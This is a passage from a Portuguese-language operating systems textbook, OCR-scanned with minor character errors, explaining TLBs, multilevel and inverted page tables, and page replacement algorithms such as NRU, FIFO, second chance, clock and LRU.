páginas durante a execução de cada instrução, tornan- 
do-a muito lenta. 


TLB (Translation Lookaside Buffers) ou memória 
associativa 


Vamos examinar agora esquemas amplamente im- 
plementados para acelerar a paginação e lidar com 
grandes espaços de endereços virtuais, começando 
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com 0 primeiro tipo. O ponto de partida da maioria das 
técnicas de otimização é o fato de a tabela de paginas 
estar na memória. Potencialmente, esse esquema tem 
um impacto enorme sobre o desempenho. Considere, 
por exemplo, uma instrução de 1 byte que copia um 
registrador para outro. Na ausência da paginação, essa 
instrução faz apenas uma referência de memória, para 
buscar a instrução. Com a paginação, pelo menos uma 
referência de memória adicional será necessária, a fim 
de acessar a tabela de páginas. Dado que a velocidade 
de execução é geralmente limitada pela taxa na qual a 
CPU pode retirar instruções e dados da memória, ter de 
fazer duas referências de memória por cada uma reduz 
o desempenho pela metade. Sob essas condições, nin- 
guém usaria a paginação. 

Projetistas de computadores sabem desse proble- 
ma há anos e chegaram a uma solução. Ela se baseia 
na observação de que a maioria dos programas tende a 
fazer um grande número de referências a um pequeno 
número de páginas, e não o contrário. Assim, apenas 
uma pequena fração das entradas da tabela de páginas é 
intensamente lida; o resto mal é usado. 

A solução que foi concebida é equipar os computa- 
dores com um pequeno dispositivo de hardware para 
mapear endereços virtuais para endereços físicos sem 
ter de passar pela tabela de páginas. O dispositivo, 
chamado de TLB (Translation Lookaside Buffer) 
ou às vezes de memória associativa, está ilustrado na 
Figura 3.12. Ele normalmente está dentro da MMU e 
consiste em um pequeno número de entradas, oito nes- 
te exemplo, mas raramente mais do que 256. Cada en- 
trada contém informações sobre uma página, incluindo 
o número da página virtual, um bit que é configurado 
quando a página é modificada, o código de proteção 
(ler/escrever/permissões de execução) e o quadro de 
página física na qual a página está localizada. Esses 
campos têm uma correspondência de um para um com 
os campos na tabela de páginas, exceto pelo número 
da página virtual, que não é necessário na tabela de 
páginas. Outro bit indica se a entrada é válida (isto é, 
em uso) ou não. 

Um exemplo que poderia gerar a TLB da Figura 
3.12 é um processo em um laço que abarque as páginas 
virtuais 19, 20 e 21, de maneira que essas entradas na 
TLB tenham códigos de proteção para leitura e execu- 
ção. Os principais dados atualmente usados (digamos, 
um arranjo sendo processado) estão nas páginas 129 e 
130. A página 140 contém os índices usados nos cál- 
culos desse arranjo. Por fim, a pilha encontra-se nas 
páginas 860 e 861. 
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Válida | Página | Modificada | Proteção | Quadro 
virtual de página 
1 140 1 RW 31 
1 20 0 RX 38 
1 130 1 RW 29 
1 129 1 RW 62 
1 19 0 RX 50 
1 21 0 RX 45 
1 860 1 RW 14 
1 861 1 RW fo 














Vamos ver agora como a TLB funciona. Quando 
um endereço virtual é apresentado para a MMU para 
tradução, o hardware primeiro confere para ver se o 
seu número de página virtual está presente na TLB 
comparando-o com todas as entradas simultaneamente 
(isto é, em paralelo). É necessário um hardware espe- 
cial para realizar isso, que todas as MMUs com TLBs 
têm. Se uma correspondência válida é encontrada e o 
acesso não viola os bits de proteção, o quadro da pági- 
na é tirado diretamente da TLB, sem ir à tabela de pá- 
ginas. Se o número da página virtual estiver presente 
na TLB, mas a instrução estiver tentando escrever em 
uma página somente de leitura, uma falha de proteção 
é gerada. 

O interessante é o que acontece quando o número 
da página virtual não está na TLB. A MMU detecta a 
ausência e realiza uma busca na tabela de páginas co- 
mum. Ela então destitui uma das entradas da TLB e a 
substitui pela entrada de tabela de páginas que acabou 
de ser buscada. Portanto, se a mesma página é usada 
novamente em seguida, da segunda vez ela resultará 
em uma presença de página em vez de uma ausência. 
Quando uma entrada é retirada da TLB, o bit modi- 
ficado é copiado de volta na entrada correspondente 
da tabela de páginas na memória. Os outros valores já 
estão ali, exceto o bit de referência. Quando a TLB é 
carregada da tabela de páginas, todos os campos são 
trazidos da memória. 


Gerenciamento da TLB por software 


Até o momento, presumimos que todas as máquinas 
com memória virtual paginada têm tabelas de página 
reconhecidas pelo hardware, mais uma TLB. Nesse 


esquema, o gerenciamento e o tratamento das faltas de 
TLB são feitos inteiramente pelo hardware da MMU. 
Interrupções para o sistema operacional ocorrem apenas 
quando uma página não está na memória. 

No passado, esse pressuposto era verdadeiro. No 
entanto, muitas máquinas RISC, incluindo o SPARC, 
MIPS e o HP PA (já abandonado), realizam todo esse 
gerenciamento de página em software. Nessas máqui- 
nas, as entradas de TLB são explicitamente carregadas 
pelo sistema operacional. Quando ocorre uma ausência 
de TLB, em vez de a MMU ir às tabelas de páginas para 
encontrar e buscar a referência de página necessária, ela 
apenas gera uma falha de TLB e joga o problema no 
colo do sistema operacional. O sistema deve encontrar a 
página, remover uma entrada da TLB, inserir uma nova 
e reiniciar a instrução que falhou. E, é claro, tudo isso 
deve ser feito em um punhado de instruções, pois ausên- 
cias de TLB ocorrem com muito mais frequência do que 
faltas de páginas. 

De maneira bastante surpreendente, se a TLB for 
moderadamente grande (digamos, 64 entradas) para re- 
duzir a taxa de ausências, o gerenciamento de software 
da TLB acaba sendo aceitavelmente eficiente. O princi- 
pal ganho aqui é uma MMU muito mais simples, o que 
libera uma área considerável no chip da CPU para ca- 
ches e outros recursos que podem melhorar o desempe- 
nho. O gerenciamento da TLB por software é discutido 
por Uhlig et al. (1994). 

Várias estratégias foram desenvolvidas muito tem- 
po atrás para melhorar o desempenho em máquinas 
que realizam gerenciamento de TLB em software. Uma 
abordagem ataca tanto a redução de ausências de TLB 
quanto a redução do custo de uma ausência de TLB 
quando ela ocorre (BALA et al., 1994). Para reduzir as 
ausências de TLB, às vezes o sistema operacional pode 
usar sua intuição para descobrir quais páginas têm mais 
chance de serem usadas em seguida e para pré-carregar 
entradas para elas na TLB. Por exemplo, quando um 
processo cliente envia uma mensagem a um processo 
servidor na mesma máquina, é muito provável que o 
processo servidor terá de ser executado logo. Sabendo 
disso, enquanto processa a interrupção para realizar o 
send, o sistema também pode conferir para ver onde o 
código, os dados e as páginas da pilha do servidor estão 
e mapeá-los antes que tenham uma chance de causar 
falhas na TLB. 

A maneira normal para processar uma ausência de 
TLB, seja em hardware ou em software, é ir até a tabela 
de páginas e realizar as operações de indexação para 
localizar a página referenciada. O problema em realizar 
essa busca em software é que as páginas que armazenam 


a tabela de páginas podem não estar na TLB, o que cau- 
sará faltas de TLB adicionais durante o processamento. 
Essas faltas podem ser reduzidas mantendo uma cache 
de software grande (por exemplo, 4 KB) de entradas em 
uma localização fixa cuja página seja sempre mantida 
na TLB. Ao conferir a primeira cache do software, o 
sistema operacional pode reduzir substancialmente as 
ausências de TLB. 

Quando o gerenciamento da TLB por software é 
usado, é essencial compreender a diferença entre di- 
versos tipos de ausências. Uma ausência leve (soft 
miss) ocorre quando a página referenciada não se en- 
contra na TLB, mas está na memória. Tudo o que é 
necessário aqui é que a TLB seja atualizada. Não é 
necessário realizar E/S em um disco. Tipicamente uma 
ausência leve necessita de 10-20 instruções de maqui- 
na para lidar e pode ser concluída em alguns nanos- 
segundos. Em comparação, uma ausência completa 
(hard miss) ocorre quando a página em si não está na 
memória (e, é claro, também não está na TLB). Um 
acesso de disco é necessário para trazer a página, o 
que pode levar vários milissegundos, dependendo do 
disco usado. Uma ausência completa é facilmente um 
milhão de vezes mais lenta que uma suave. Procurar o 
mapeamento na hierarquia da tabela de páginas é co- 
nhecido como um passeio na tabela de páginas (page 
table walk). 

Na realidade, a questão é mais complicada ainda. 
Uma ausência não é somente leve ou completa. Algu- 
mas ausências são ligeiramente leves (ou mais comple- 
tas) do que outras. Por exemplo, suponha que o passeio 
de página não encontre a página na tabela de páginas do 
processo e o programa incorra, portanto, em uma fal- 
ta de página. Há três possibilidades. Primeiro, a página 
pode estar na realidade na memória, mas não na tabela 
de páginas do processo. Por exemplo, a página pode ter 
sido trazida do disco por outro processo. Nesse caso, 
não precisamos acessar o disco novamente, mas basta 
mapear a página de maneira apropriada nas tabelas de 
páginas. Essa é uma ausência bastante leve chamada 
falta de página menor (minor page fault). Segundo, 
uma falta de página maior (major page fault) ocorre 
se ela precisar ser trazida do disco. Terceiro, é possível 
que o programa apenas tenha acessado um endereço in- 
válido e nenhum mapeamento precisa ser acrescentado 
à TLB. Nesse caso, o sistema operacional tipicamente 
mata o programa com uma falta de segmentação. Ape- 
nas nesse caso o programa fez algo errado. Todos os 
outros casos são automaticamente corrigidos pelo hard- 
ware e/ou o sistema operacional — ao custo de algum 
desempenho. 
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3.3.4 Tabelas de páginas para memórias grandes 


As TLBs podem ser usadas para acelerar a tradução 
de endereços virtuais para endereços físicos em relação 
ao esquema de tabela de páginas na memória original. 
Mas esse não é o único problema que precisamos com- 
bater. Outro problema é como lidar com espaços de en- 
dereços virtuais muito grandes. A seguir discutiremos 
duas maneiras de lidar com eles. 


Tabelas de páginas multinível 


Como uma primeira abordagem, considere o uso de 
uma tabela de páginas multinível. Um exemplo sim- 
ples é mostrado na Figura 3.13. Na Figura 3.13(a) temos 
um endereço virtual de 32 bits que é dividido em um 
campo PTI de 10 bits, um campo P72 de 10 bits e um 
campo de Deslocamento de 12 bits. Dado que os deslo- 
camentos são de 12 bits, as páginas são de 4 KB e há um 
total de 2?º delas. 

O segredo para o uso do método da tabela de páginas 
multinível é evitar manter todas as tabelas de páginas 
na memória o tempo inteiro. Em particular, aquelas que 
não são necessárias não devem ser mantidas. Suponha, 
por exemplo, que um processo precise de 12 megabytes: 
os 4 megabytes da base da memória para o código do 
programa, os próximos 4 megabytes para os dados e os 
4 megabytes do topo da memória para a pilha. Entre o 
topo dos dados e a parte de baixo da pilha ha um espaço 
gigante que não é usado. 

Na Figura 3.13(b) vemos como a tabela de páginas 
de dois níveis funciona. À esquerda vemos a tabela de 
páginas de nível 1, com 1024 entradas, correspondendo 
ao campo P77 de 10 bits. Quando um endereço virtual é 
apresentado à MMU, ele primeiro extrai o campo PTI e 
usa esse valor como um índice na tabela de páginas de 
nível 1. Cada uma dessas 1024 entradas representa 4M, 
pois todo o espaço de endereço virtual de 4 gigabytes 
(isto é, 32 bits) foi dividido em segmentos de 4096 bytes. 

A entrada da tabela de páginas de nível 1, localizada 
através do campo PT7 do endereço virtual, aponta para 
o endereço ou o número do quadro de página de uma 
tabela de páginas de nivel 2. A entrada 0 da tabela de pá- 
ginas de nível 1 aponta para a tabela de páginas relativa 
ao código do programa, a entrada 1 aponta para a tabela 
de páginas relativa aos dados e a entrada 1023 aponta 
para a tabela de páginas relativa à pilha. As outras entra- 
das (sombreadas) não são usadas. O campo P72 é agora 
usado como um índice na tabela de páginas de nível 2 
escolhida para encontrar o número do quadro de página 
correspondente. 
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Como exemplo, considere o endereço virtual de 32 
bits 0x00403004 (4.206.596 em decimal), que corres- 
ponde a 12.292 bytes dentro do trecho dos dados. Esse 
endereço virtual corresponde a PT] = 1, PT2 = 3 e Des- 
locamento = 4. A MMU primeiro usa o PTI com índice 
da tabela de páginas de nível 1 e obtém a entrada 1, que 
corresponde aos endereços de 4M a 8M — 1. Ela então 
usa PT2 como indice para a tabela de paginas de nível 2 
recém-encontrada e extrai a entrada 3, que corresponde 
aos endereços 12.228 a 16.383 dentro de seu pedaço de 
4M (isto é, endereços absolutos 4.206.592 a 4.210.687). 
Essa entrada contém o número do quadro de página con- 
tendo o endereço virtual 0x00403004. Se essa página não 
está na memória, o bit Presente/ausente na entrada da ta- 
bela de páginas terá o valor zero, o que causará uma falta 
de página. Se a página estiver presente na memória, o 
número do quadro de página tirado da tabela de páginas 
de nível 2 será combinado com o deslocamento (4) para 
construir o endereço físico. Esse endereço é colocado no 
barramento e enviado para a memória. 

O interessante a ser observado a respeito da Figura 
3.13 é que, embora o espaço de endereço contenha mais 


de um milhão de páginas, apenas quatro tabelas de pági- 
nas são necessárias: a tabela de nível 1 e as três tabelas de 
nivel 2 relativas aos endereços de 0 a 4M (para o código 
do programa), 4M a 8M (para os dados) e aos 4M do topo 
(para a pilha). Os bits Presente/ausente nas 1021 entradas 
restantes da página do nível superior são configurados 
para 0, forçando uma falta de página se um dia forem 
acessados. Se isso ocorrer, o sistema operacional notará 
que o processo está tentando referenciar uma memória 
que ele não deveria e tomará as medidas apropriadas, 
como enviar-lhe um sinal ou derrubá-lo. Nesse exemplo, 
escolhemos números arredondados para os vários tama- 
nhos e escolhemos PTI igual a PT2, mas na prática ou- 
tros valores também são possíveis, é claro. 

O sistema de tabelas de páginas de dois níveis da Fi- 
gura 3.13 pode ser expandido para três, quatro, ou mais 
níveis. Níveis adicionais proporcionam mais flexibilida- 
de. Por exemplo, o processador 80.386 de 32 bits da Intel 
(lançado em 1985) era capaz de lidar com até 4 GB de 
memória, usando uma tabela de páginas de dois níveis, 
que consistia de um diretório de páginas cujas entra- 
das apontavam para as tabelas de páginas, que, por sua 
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vez, apontavam para os quadros de página de 4 KB reais. 
Tanto o diretório de páginas quanto as tabelas de páginas 
continham 1024 entradas cada, dando um total de 2!º x 
219 x 212 = 23? bytes endereçáveis, como desejado. 

Dez anos mais tarde, o Pentium Pro introduziu outro 
nível: a tabela de apontadores de diretórios de página 
(page directory pointer table). Além disso, ele ampliou 
cada entrada em cada nível da hierarquia da tabela de pá- 
ginas de 32 para 64 bits, então ele poderia endereçar me- 
mórias acima do limite de 4 GB. Como ele tinha apenas 
4 entradas na tabela do apontador do diretório de páginas, 
512 em cada diretório de páginas e 512 em cada tabela 
de páginas, o montante total de memória que ele podia 
endereçar ainda era limitado a um máximo de 4 GB. 
Quando o suporte de 64 bits apropriado foi acrescentado 
à família x86 (originalmente pelo AMD), o nível adicio- 
nal poderia ter sido chamado de “apontador de tabelas de 
apontadores de diretórios de página” ou algo tão horrível 
quanto. Isso estaria perfeitamente de acordo com a ma- 
neira como os produtores de chips tendem a nomear as 
coisas. Ainda bem que não fizeram isso. A alternativa que 
apresentaram, “mapa de página nível 4”, pode não ser 
um nome especialmente prático, mas pelo menos é mais 
curto e um pouco mais claro. De qualquer maneira, esses 
processadores agora usam todas as 512 entradas em to- 
das as tabelas, resultando em uma quantidade de memó- 
ria endereçável de 2º x 2° x 2º x 2° x 212 = 248 bytes. Eles 
poderiam ter adicionado outro nível, mas provavelmente 
acharam que 256 TB seriam suficientes por um tempo. 


Tabelas de páginas invertidas 


Uma alternativa para os níveis cada vez maiores em 
uma hierarquia de paginação é conhecida como tabela 
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de páginas invertidas. Elas foram usadas pela primeira 
vez por processadores como o PowerPC, o UltraSPARC 
e o Itanium (às vezes referido como “Itanic”, já que não 
foi realmente o sucesso que a Intel esperava). Nesse pro- 
jeto, há apenas uma entrada por quadro de página na me- 
mória real, em vez de uma entrada por página de espaço 
de endereço virtual. Por exemplo, com os endereços vir- 
tuais de 64 bits, um tamanho de página de 4 KB e 4 GB 
de RAM, uma tabela de página invertida exige apenas 
1.048.576 entradas. A entrada controla qual (processo, 
página virtual) está localizado na moldura da página. 

Embora tabelas de páginas invertidas poupem muito 
espaço, pelo menos quando o espaço de endereço virtual 
é muito maior do que a memória física, elas têm um sério 
problema: a tradução virtual-física torna-se muito mais 
difícil. Quando o processo n referencia a página virtual 
p, O hardware não consegue mais encontrar a página fí- 
sica usando p como um índice para a tabela de páginas. 
Em vez disso, ele deve pesquisar a tabela de páginas in- 
vertidas inteira para uma entrada (n, p). Além disso, essa 
pesquisa deve ser feita em cada referência de memória, 
não apenas em faltas de páginas. Pesquisar uma tabela 
de 256K a cada referência de memória não é a melhor 
maneira de tornar sua máquina realmente rápida. 

A saída desse dilema é fazer uso da TLB. Se ela 
conseguir conter todas as páginas intensamente usa- 
das, a tradução pode acontecer tão rápido quanto com 
as tabelas de páginas regulares. Em uma ausência na 
TLB, no entanto, a tabela de página invertida tem de ser 
pesquisada em software. Uma maneira de realizar essa 
pesquisa é ter uma tabela de espalhamento (hash) nos 
endereços virtuais. Todas as páginas virtuais atualmente 
na memória que têm o mesmo valor de espalhamento 
são encadeadas juntas, como mostra a Figura 3.14. Se 


(SEXO Comparação de uma tabela de página tradicional com uma tabela de página invertida. 
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Quadro 
de pagina 


Pagina 
virtual 
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a tabela de encadeamento tiver o mesmo número de 
entradas que o número de páginas físicas da máquina, 
o encadeamento médio será de apenas uma entrada de 
comprimento, acelerando muito o mapeamento. Assim 
que o número do quadro de página for encontrado, a 
nova dupla (virtual, física) é inserida na TLB. 

As tabelas de páginas invertidas são comuns em má- 
quinas de 64 bits porque mesmo com um tamanho de 
página muito grande, o número de entradas de tabela de 
páginas é gigantesco. Por exemplo, com páginas de 4 
MB e endereços virtuais de 64 bits, são necessárias 2” 
entradas de tabelas de páginas. Outras abordagens para 
lidar com grandes memórias virtuais podem ser encon- 
tradas em Talluri et al. (1995). 


3.4 Algoritmos de substituição de 
páginas 


Quando ocorre uma falta de página, o sistema ope- 
racional tem de escolher uma página para remover da 
memória a fim de abrir espaço para a que está chegan- 
do. Se a página a ser removida foi modificada enquanto 
estava na memória, ela precisa ser reescrita para o dis- 
co a fim de atualizar a cópia em disco. Se, no entanto, 
ela não tiver sido modificada (por exemplo, ela contém 
uma página de código), a cópia em disco já está atuali- 
zada, portanto não é preciso reescrevê-la. A página a ser 
lida simplesmente sobrescreve a página que está sendo 
removida. 

Embora seja possível escolher uma página ao acaso 
para ser descartada a cada falta de página, o desempe- 
nho do sistema será muito melhor se for escolhida uma 
página que não é intensamente usada. Se uma página in- 
tensamente usada for removida, ela provavelmente terá 
de ser trazida logo de volta, resultando em um custo ex- 
tra. Muitos trabalhos, tanto teóricos quanto experimen- 
tais, têm sido feitos sobre o assunto dos algoritmos de 
substituição de páginas. A seguir descreveremos alguns 
dos mais importantes. 

Vale a pena observar que o problema da “substi- 
tuição de páginas” ocorre em outras áreas do projeto 
de computadores também. Por exemplo, a maioria dos 
computadores tem um ou mais caches de memória con- 
sistindo de blocos de memória de 32 ou 64 bytes. Quan- 
do a cache está cheia, algum bloco precisa ser escolhido 
para ser removido. Esse problema é precisamente o 
mesmo que ocorre na substituição de páginas, exceto 
em uma escala de tempo mais curta (ele precisa ser fei- 
to em alguns nanossegundos, não milissegundos como 
com a substituição de páginas). A razão para a escala de 


tempo mais curta é que as ausências do bloco na cache 
são satisfeitas a partir da memória principal, que não 
tem atrasos devido ao tempo de busca e de latência ro- 
tacional do disco. 

Um segundo exemplo ocorre em um servidor da 
web. O servidor pode manter um determinado número 
de páginas da web intensamente usadas em sua cache 
de memória. No entanto, quando ela está cheia e uma 
nova página é referenciada, uma decisão precisa ser to- 
mada a respeito de qual página na web remover. As con- 
siderações são similares a páginas de memória virtual, 
exceto que as da web jamais são modificadas na cache, 
então sempre há uma cópia atualizada “no disco”. Em 
um sistema de memória virtual, as páginas na memória 
principal podem estar limpas ou sujas. 

Em todos os algoritmos de substituição de páginas 
a serem estudados a seguir, surge a seguinte questão: 
quando uma página será removida da memória, ela deve 
ser uma das páginas do próprio processo que causou a 
falta ou pode ser uma pertencente a outro processo? No 
primeiro caso, estamos efetivamente limitando cada 
processo a um número fixo de páginas; no segundo, 
não. Ambas são possibilidades. Voltaremos a esse ponto 
na Seção 3.5.1. 


3.4.1 O algoritmo ótimo de substituição de página 


O algoritmo de substituição de página melhor possi- 
vel é fácil de descrever, mas impossível de implementar 
de fato. Ele funciona deste modo: no momento em que 
ocorre uma falta de página, há um determinado con- 
junto de páginas na memória. Uma dessas páginas será 
referenciada na próxima instrução (a página contendo 
essa instrução). Outras páginas talvez não sejam refe- 
renciadas até 10, 100 ou talvez 1.000 instruções mais 
tarde. Cada página pode ser rotulada com o número de 
instruções que serão executadas antes de aquela página 
ser referenciada pela primeira vez. 

O algoritmo ótimo diz que a página com o maior ró- 
tulo deve ser removida. Se uma página não vai ser usada 
para 8 milhões de instruções e outra página não vai ser 
usada para 6 milhões de instruções, remover a primeira 
adia ao máximo a próxima falta de página. Computado- 
res, como as pessoas, tentam adiar ao máximo a ocor- 
rência de eventos desagradáveis. 

O único problema com esse algoritmo é que ele 
é irrealizável. No momento da falta de página, o sis- 
tema operacional não tem como saber quando cada 
uma das páginas será referenciada em seguida. (Vi- 
mos uma situação similar anteriormente com o algo- 
ritmo de escalonamento “tarefa mais curta primeiro” 


— como o sistema pode dizer qual tarefa é a mais 
curta?) Mesmo assim, ao executar um programa em 
um simulador e manter um controle sobre todas as 
referências de páginas, é possível implementar o al- 
goritmo ótimo na segunda execução usando as infor- 
mações de referência da página colhidas durante a 
primeira execução. 

Dessa maneira, é possível comparar o desempenho 
de algoritmos realizáveis com o do melhor possível. Se 
um sistema operacional atinge um desempenho de, di- 
gamos, apenas 1% pior do que o do algoritmo ótimo, o 
esforço investido em procurar por um algoritmo melhor 
resultará em uma melhora de no máximo 1%. 

Para evitar qualquer confusão possível, é preciso 
deixar claro que esse registro de referências às páginas 
trata somente do programa recém-mensurado e então 
com apenas uma entrada específica. O algoritmo de 
substituição de página derivado dele é, então, específico 
aquele programa e dados de entrada. Embora esse mé- 
todo seja útil para avaliar algoritmos de substituição de 
página, ele não tem uso para sistemas práticos. A seguir, 
estudaremos algoritmos que são úteis em sistemas reais. 


3.4.2 O algoritmo de substituição de paginas não 
usadas recentemente (NRU) 


A fim de permitir que o sistema operacional colete 
estatísticas de uso de páginas úteis, a maioria dos com- 
putadores com memória virtual tem dois bits de status, 
R e M, associados com cada página. R é colocado sem- 
pre que a página é referenciada (lida ou escrita). M é 
colocado quando a página é escrita (isto é, modificada). 
Os bits estão contidos em cada entrada de tabela de pá- 
gina, como mostrado na Figura 3.11. É importante per- 
ceber que esses bits precisam ser atualizados em cada 
referência de memória, então é essencial que eles sejam 
atualizados pelo hardware. Assim que um bit tenha sido 
modificado para 1, ele fica em 1 até o sistema operacio- 
nal reinicializá-lo em 0. 

Se o hardware não tem esses bits, eles podem ser 
simulados usando os mecanismos de interrupção de re- 
lógio e falta de página do sistema operacional. Quando 
um processo é inicializado, todas as entradas de tabela 
de páginas são marcadas como não presentes na me- 
mória. Tão logo qualquer página é referenciada, uma 
falta de página vai ocorrer. O sistema operacional então 
coloca o bit R em 1 (em suas tabelas internas), muda a 
entrada da tabela de páginas para apontar para a página 
correta, com o modo SOMENTE LEITURA, e reinicia- 
liza a instrução. Se a página for subsequentemente mo- 
dificada, outra falta de página vai ocorrer, permitindo 
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que o sistema operacional coloque o bit M e mude o 
modo da página para LEITURA/ESCRITA. 

Os bits R e M podem ser usados para construir um 
algoritmo de paginação simples como a seguir. Quando 
um processo é inicializado, ambos os bits de páginas 
para todas as suas páginas são definidos como 0 pelo 
sistema operacional. Periodicamente (por exemplo, em 
cada interrupção de relógio), o bit R é limpo, a fim de 
distinguir as páginas não referenciadas recentemente 
daquelas que foram. 

Quando ocorre uma falta de página, o sistema opera- 
cional inspeciona todas as páginas e as divide em quatro 
categorias baseadas nos valores atuais de seus bits R e 
M: 


Classe 0: não referenciada, não modificada. 
Classe 1: não referenciada, modificada. 
Classe 2: referenciada, não modificada. 
Classe 3: referenciada, modificada. 


Embora as páginas de classe 1 pareçam, em um pri- 
meiro olhar, impossíveis, elas ocorrem quando uma 
página de classe 3 tem o seu bit R limpo por uma inter- 
rupção de relógio. Interrupções de relógio não limpam 
o bit M porque essa informação é necessária para saber 
se a página precisa ser reescrita para o disco ou não. 
Limpar R, mas não M, leva a uma página de classe 1. 

O algoritmo NRU (Not Recently Used — não usada 
recentemente) remove uma página ao acaso de sua clas- 
se de ordem mais baixa que não esteja vazia. Implícito 
nesse algoritmo está a ideia de que é melhor remover 
uma página modificada, mas não referenciada, a pelo 
menos um tique do relógio (em geral em torno de 20 
ms) do que uma página não modificada que está sendo 
intensamente usada. A principal atração do NRU é que 
ele é fácil de compreender, moderadamente eficiente de 
implementar e proporciona um desempenho que, embo- 
ra não ótimo, pode ser adequado. 


3.4.3 O algoritmo de substituição de páginas 
primeiro a entrar, primeiro a sair 


Outro algoritmo de paginação de baixo custo é o 
primeiro a entrar, primeiro a sair (first in, first out 
— FIFO). Para ilustrar como isso funciona, considere 
um supermercado que tem prateleiras suficientes para 
exibir exatamente k produtos diferentes. Um dia, uma 
empresa introduz um novo alimento de conveniência 
— um iogurte orgânico, seco e congelado, de reconsti- 
tuição instantânea em um forno de micro-ondas. É um 
sucesso imediato, então nosso supermercado finito tem 
de se livrar do produto antigo para estocá-lo. 
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Uma possibilidade é descobrir qual produto o super- 
mercado tem estocado há mais tempo (isto é, algo que 
ele começou a vender 120 anos atrás) e se livrar dele 
supondo que ninguém mais se interessa. Na realidade, 
o supermercado mantém uma lista encadeada de todos 
os produtos que ele vende atualmente na ordem em que 
foram introduzidos. O produto novo vai para o fim da 
lista; o que está em primeiro na lista é removido. 

Com um algoritmo de substituição de página, po- 
de-se aplicar a mesma ideia. O sistema operacional 
mantém uma lista de todas as páginas atualmente na 
memória, com a chegada mais recente no fim e a mais 
antiga na frente. Em uma falta de página, a página da 
frente é removida e a nova página acrescentada ao fim 
da lista. Quando aplicado a lojas, FIFO pode remover a 
cera para bigodes, mas também pode remover a farinha, 
sal ou manteiga. Quando aplicado aos computadores, 
surge o mesmo problema: a página mais antiga ainda 
pode ser útil. Por essa razão, FIFO na sua forma mais 
pura raramente é usado. 


3.4.4 O algoritmo de substituição de páginas 
segunda chance 


Uma modificação simples para o FIFO que evita o 
problema de jogar fora uma página intensamente usada 
é inspecionar o bit R da página mais antiga. Se ele for 
0, a página é velha e pouco utilizada, portanto é subs- 
tituída imediatamente. Se o bit R for 1, o bit é limpo, 
e a página é colocada no fim da lista de páginas, e seu 
tempo de carregamento é atualizado como se ela tivesse 
recém-chegado na memória. Então a pesquisa continua. 

A operação desse algoritmo, chamada de segunda 
chance, é mostrada na Figura 3.15. Na Figura 3.15(a) ve- 
mos as páginas 4 até H mantidas em uma lista encadeada 
e divididas pelo tempo que elas chegaram na memória. 

Suponha que uma falta de página ocorra no instante 
20. A página mais antiga é 4, que chegou no instante 0, 


quando o processo foi inicializado. Se o bit R da pági- 
na 4 for 0, ele será removido da memória, seja sendo 
escrito para o disco (se ele for sujo), ou simplesmente 
abandonado (se ele for limpo). Por outro lado, se o bit 
R for 1, 4 será colocado no fim da lista e seu “tempo 
de carregamento” será atualizado para o momento atual 
(20). O bit R é também colocado em 0. A busca por uma 
página adequada continua com B. 

O que o algoritmo segunda chance faz é procurar 
por uma página antiga que não esteja referenciada no 
intervalo de relógio mais recente. Se todas as páginas 
foram referenciadas, a segunda chance degenera-se em 
um FIFO puro. Especificamente, imagine que todas as 
páginas na Figura 3.15(a) têm seus bits R em 1. Uma a 
uma, o sistema operacional as move para o fim da lista, 
zerando o bit R cada vez que ele anexa uma página ao 
fim da lista. Por fim, a lista volta à página 4, que agora 
tem seu bit R zerado. Nesse ponto 4 é removida. Assim, 
o algoritmo sempre termina. 


3.4.5 O algoritmo de substituição de páginas do 
relógio 


Embora segunda chance seja um algoritmo razoável, 
ele é desnecessariamente ineficiente, pois ele está sem- 
pre movendo páginas em torno de sua lista. Uma abor- 
dagem melhor é manter todos os quadros de páginas em 
uma lista circular na forma de um relógio, como mos- 
trado na Figura 3.16. Um ponteiro aponta para a página 
mais antiga. 

Quando ocorre uma falta de página, a página indi- 
cada pelo ponteiro é inspecionada. Se o bit R for 0, a 
página é removida, a nova página é inserida no relógio 
em seu lugar, e o ponteiro é avançado uma posição. Se R 
for 1, ele é zerado e o ponteiro avançado para a próxima 
página. Esse processo é repetido até que a página seja 
encontrada com R = 0. Sem muita surpresa, esse algo- 
ritmo é chamado de relógio. 


KENT mi Operação de segunda chance. (a) Páginas na ordem FIFO. (b) Lista de páginas se uma falta de página ocorrer no tempo 
20 e o bit R de A possuir o valor 1. Os números acima das páginas são seus tempos de carregamento. 
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[eU O algoritmo de substituição de páginas do relógio. 


Quando ocorre uma falta de página, 
a página indicada pelo ponteiro 

é inspecionada. A ação executada 
depende do bit R: 


R = 0: Remover a página 
R = 1: Zerar Re avançar o ponteiro 


3.4.6 Algoritmo de substituição de páginas 
usadas menos recentemente (LRU) 


Uma boa aproximação para o algoritmo ótimo é ba- 
seada na observação de que as páginas que foram usa- 
das intensamente nas últimas instruções provavelmente 
o serão em seguida de novo. De maneira contrária, pági- 
nas que não foram usadas há eras provavelmente segui- 
rão sem ser utilizadas por um longo tempo. Essa ideia 
sugere um algoritmo realizável: quando ocorre uma 
falta de página, jogue fora aquela que não tem sido 
usada há mais tempo. Essa estratégia é chamada de pa- 
ginação LRU (Least Recently Used — usada menos 
recentemente). 

Embora o LRU seja teoricamente realizável, ele 
não é nem um pouco barato. Para se implementar por 
completo o LRU, é necessário que seja mantida uma 
lista encadeada de todas as páginas na memória, com 
a pagina mais recentemente usada na frente e a menos 
recentemente usada na parte de trás. A dificuldade é 
que a lista precisa ser atualizada a cada referência de 
memória. Encontrar uma página na lista, deletá-la e en- 
tão movê-la para a frente é uma operação que demanda 
muito tempo, mesmo em hardware (presumindo que um 
hardware assim possa ser construído). 

No entanto, há outras maneiras de se implemen- 
tar o LRU com hardwares especiais. Primeiro, vamos 
considerar a maneira mais simples. Esse método exige 
equipar o hardware com um contador de 64 bits, C, 
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que é automaticamente incrementado após cada ins- 
trução. Além disso, cada entrada da tabela de páginas 
também deve ter um campo grande o suficiente para 
conter o contador. Após cada referência de memória, 
o valor atual de C é armazenado na entrada da tabela 
de páginas para a página recém-referenciada. Quan- 
do ocorre uma falta de página, o sistema operacional 
examina todos os contadores na tabela de página para 
encontrar a mais baixa. Essa página é a usada menos 
recentemente. 


3.4.7 Simulação do LRU em software 


Embora o algoritmo de LRU anterior seja (em prin- 
cípio) realizável, poucas máquinas, se é que existe 
alguma, têm o hardware necessário. Em vez disso, é ne- 
cessária uma solução que possa ser implementada em 
software. Uma possibilidade é o algoritmo de substitui- 
ção de páginas não usadas frequentemente (NFU — Not 
Frequently Used). A implementação exige um conta- 
dor de software associado com cada página, de início 
zero. À cada interrupção de relógio, o sistema opera- 
cional percorre todas as páginas na memória. Para cada 
página, o bit R, que é 0 ou 1, é adicionado ao contador. 
Os contadores controlam mais ou menos quão frequen- 
